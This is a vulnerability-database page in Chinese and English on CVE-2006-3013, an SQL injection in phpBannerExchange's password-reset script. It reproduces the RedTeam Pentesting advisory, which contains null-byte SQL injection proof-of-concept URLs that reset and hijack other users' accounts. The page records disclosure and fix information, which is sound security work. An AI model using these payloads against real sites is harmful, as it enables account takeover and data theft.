CVE-2006-3013
CVSS5.1
发布时间 :2006-06-19 06:02:00
修订时间 :2011-03-07 21:37:28
NMCOPS    

[原文]Interpretation conflict in resetpw.php in phpBannerExchange before 2.0 Update 6 allows remote attackers to execute arbitrary SQL commands via an email parameter containing a null (%00) character after a valid e-mail address, which passes the validation check in the eregi PHP command. NOTE: it could be argued that this vulnerability is due to a bug in the eregi PHP command and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in phpBannerExchange.


[CNNVD]phpBannerExchange resetpw.php sql注入漏洞(CNNVD-200606-348)

        phpBannerExchange 2.0 Update 6之前版本中的resetpw.php存在解释冲突。远程攻击者可以借助e-mail地址之后含有空(%00) 字符的email参数, 通过eregi PHP命令中的验证检查,从而执行任意SQL命令。 注意: 有人可能认为此漏洞是由 eregi PHP命令中的bug所致,应当在PHP中进行适当修复;如果是这样,则不应将其视为phpBannerExchange中的漏洞。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:eschew.net:phpbannerexchange:2.0_update_3
cpe:/a:eschew.net:phpbannerexchange:2.0
cpe:/a:eschew.net:phpbannerexchange:2.0_update_2
cpe:/a:eschew.net:phpbannerexchange:2.0_update_1
cpe:/a:eschew.net:phpbannerexchange:2.0_update_4
cpe:/a:eschew.net:phpbannerexchange:2.0_update_5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3013
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3013
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-348
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/18448
(PATCH)  BID  18448
http://www.securityfocus.com/archive/1/archive/1/437294/100/0/threaded
(PATCH)  BUGTRAQ  20060615 Advisory: Unauthorized password recovery in phpBannerExchange
http://www.eschew.net/scripts/phpbe/2.0/releasenotes.php
(VENDOR_ADVISORY)  CONFIRM  http://www.eschew.net/scripts/phpbe/2.0/releasenotes.php
http://secunia.com/advisories/20687
(VENDOR_ADVISORY)  SECUNIA  20687
http://www.vupen.com/english/advisories/2006/2358
(UNKNOWN)  VUPEN  ADV-2006-2358
http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt
(UNKNOWN)  MISC  http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt
http://xforce.iss.net/xforce/xfdb/27193
(UNKNOWN)  XF  phpbannerexchange-resetpw-info-disclosure(27193)
http://www.osvdb.org/26509
(UNKNOWN)  OSVDB  26509
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046953.html
(UNKNOWN)  FULLDISC  20060615 Advisory: Unauthorized password recovery in phpBannerExchange

- 漏洞信息

phpBannerExchange resetpw.php sql注入漏洞
中危 输入验证
2006-06-19 00:00:00 2006-06-19 00:00:00
远程  
        phpBannerExchange 2.0 Update 6之前版本中的resetpw.php存在解释冲突。远程攻击者可以借助e-mail地址之后含有空(%00) 字符的email参数, 通过eregi PHP命令中的验证检查,从而执行任意SQL命令。 注意: 有人可能认为此漏洞是由 eregi PHP命令中的bug所致,应当在PHP中进行适当修复;如果是这样,则不应将其视为phpBannerExchange中的漏洞。

- 公告与补丁

        厂商已经发布2.0.RC5 版来解决这些问题。详见参考部分。
        http://www.eschew.net/scripts/download.php?id=12

- 漏洞信息 (F47617)

rt-sa-2006-005.txt (PacketStormID:F47617)
2006-06-25 00:00:00
RedTeam Pentesting  redteam-pentesting.de
exploit,sql injection
CVE-2006-3013
[点击下载]

RedTeam has identified a SQL injection that can be triggered due to a lack of user input sanitization in phpBannerExchange versions 2.0 RC5 and below. It is possible to recover a password of a user and thereby overtake his account.

Advisory: Unauthorized password recovery in phpBannerExchange

RedTeam identified an SQL injection that can be triggered due to a bad
user input sanitization in phpBannerExchange. It is possible to recover
a password of an user and thereby overtake his account.


Details
=======

Product: phpBannerExchange
Affected Versions: All versions up to phpBannerExchange 2.0 RC5
Fixed Versions: 2.0 RC6
Vulnerability Type: Bad user input sanitization, SQL injection
Security-Risk: medium
Vendor-URL: http://www.eschew.net/scripts/phpbe/2.0/
Vendor-Status: informed, fixed version released
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt
Advisory-Status: public
CVE: CVE-2006-3013
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3013


Introduction
============

From the vendor's homepage:
phpBannerExchange is a PHP/mySQL script that allows virtually anyone
with minimal knowledge of PHP, mySQL and web hosting to run their own
banner exchange. 


More Details
============

If a user forgot the password of his phpBannerExchange account, he
can reset it by supplying his email address.
In "resetpw.php" the variable $email contains this email address,
which is then validated by a regular expression.

[...]
42    if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*
                 (\.[a-z]{2,3})$", $email)){
[...]

Due to a bug in the implementation of eregi(), it is possible to pass
additional characters by using a Null Byte "\0". Because the backend
of eregi() is implemented in C, $email is treated as a zero-terminated
string. All characters starting from the Null Byte on will not be
recognized by the regular expression. Therefore you can pass an email
address, that includes the special character "'" to break the following
SQL query:

[...]
48    $get_info=mysql_query("select * from banneruser where 
                             email='$email'");
[...]

After that, a new password for the chosen user is generated and sent via

[...]
68    mail($email,$usrsubject,$usrcontent,"From: $ownermail");
[...]

Note that mail() will treat $email as a zero-terminated string, too.
Thereby, an attacker can reset the password of a user account and send
it to his own email address.


Proof of Concept
================

Use following URLs with your favorite web browser:

http://example.com/phpbe/resetpw.php?
    submit=&email=attacker@example.com%00'or email='victim@example.com

to retrieve the password of the user with the email address
"victim@example.com" or

http://example.com/phpbe/resetpw.php?
    submit=&email=attacker@example.com%00'or id='1

to retrieve the password of the user with user id "1".


Workaround
==========

Use PHP Magic Quotes.


Fix
===

Upgrade to version 2.0 RC6


Security Risk
=============

The security risk is high because an attacker could gain access to an
administrator account and view and alter the database and hereby compromise
the whole application.


History
=======

2006-06-09 Discovery of the problem
2006-06-10 Vendor is informed
2006-06-12 Vendor released fixed version

References
==========

[1] http://www.eschew.net/scripts/phpbe/2.0/


RedTeam
=======

RedTeam Pentesting is offering individual penetration tests, short
pentests, performed by a team of specialised IT-security experts.
Hereby, security weaknesses in company networks are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam wants to share its
knowledge and enhance the public knowledge with research in security
related areas. The results are made available as public security
advisories.

More information about RedTeam can be found at
http://www.redteam-pentesting.de.

-- 
RedTeam Pentesting            Tel.: +49-(0)241-963 1300
Dennewartstr. 25-27           Fax : +49-(0)241-963 1304
52068 Aachen           http://www.redteam-pentesting.de
    

- 漏洞信息

26509
phpBannerExchange resetpw.php email Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

PhpBannerExchange contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the resetpw.php script not properly sanitizing user-supplied input to the 'email' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2006-06-15 2006-06-09
2006-06-15 Unknow

- 解决方案

Upgrade to version 2.0 RC6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

phpBannerExchange Multiple SQL Injection Vulnerabilities
Input Validation Error 18448
Yes No
2006-06-15 12:00:00 2006-06-15 09:41:00
RedTeam Pentesting is credited with the discovery of these vulnerabilities.

- 受影响的程序版本

eschew.net phpBannerExchange 2.0 RC5
eschew.net phpBannerExchange 2.0
eschew.net phpBannerExchange 2.0 RC6

- 不受影响的程序版本

eschew.net phpBannerExchange 2.0 RC6

- 漏洞讨论

phpBannerExchange is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

- 漏洞利用

These issues can be exploited through a web client.

- 解决方案

The vendor has released version 2.0.RC5 to address these issues; please see the reference section for details.


eschew.net phpBannerExchange 2.0 RC5

eschew.net phpBannerExchange 2.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站